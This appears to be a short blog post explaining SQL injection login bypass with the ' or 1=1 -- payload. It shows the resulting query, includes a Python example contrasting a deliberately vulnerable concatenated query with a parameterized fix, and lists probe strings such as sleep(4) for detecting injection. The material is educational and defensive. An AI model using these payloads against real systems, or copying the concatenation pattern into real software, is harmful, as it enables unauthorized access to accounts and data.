Log in with a "universal password" by passing the parameter ' or 1=1 -- ' in the username field
SELECT username,password FROM users WHERE username='textvalue' or 1=1 -- ' AND password='textvalue2'
- Input characters
formusr = ' or 1=1 --
formpwd = anything
- The query that actually runs
SELECT * FROM users WHERE username='' or 1=1 -- ' AND password = 'anything'
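The bypass above, reproduced against an in-memory SQLite database beside the parameterized form that stops it. This is an added example, not code from the original post; the sample row, the function names `login_concat` and `login_param`, and the use of Python's `sqlite3` are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data: one user in an in-memory database.
    # Plaintext passwords only mirror the query shown on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn

def login_concat(conn, formusr, formpwd):
    # Vulnerable: form values are pasted into the SQL text, so a quote in
    # formusr ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT username,password FROM users "
           "WHERE username='" + formusr + "' AND password='" + formpwd + "'")
    return conn.execute(sql).fetchall(), sql

def login_param(conn, formusr, formpwd):
    # Hardened: placeholders keep the form values as data; the driver never
    # re-parses them as SQL, so quotes and comment markers have no effect.
    sql = "SELECT username,password FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (formusr, formpwd)).fetchall()

if __name__ == "__main__":
    conn = make_db()
    formusr, formpwd = "' or 1=1 -- ", "anything"  # input from the page

    rows, sql = login_concat(conn, formusr, formpwd)
    print("query sent :", sql)
    print("concat     :", rows)   # every row matches: password check is commented out

    print("param      :", login_param(conn, formusr, formpwd))   # no match
    print("param (ok) :", login_param(conn, "alice", "s3cret"))  # real login still works
```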
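Ways to determine whether an HTTP request is vulnerable to SQL injection
- Classic: and 1=1 | and 2 > 1 | or 1 = 1 | or 1 < 1
- Database functions: sleep(4) = 1 | length(user()) > 3
- Special characters: single quote (') double quote (")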
- Author:KingCode
- URL:https://kingcode.dpdns.org/article/6352db5f-1399-407c-a188-8f545616dc82
- Copyright:All articles in this blog, except for special statements, adopt BY-NC-SA agreement. Please indicate the source!









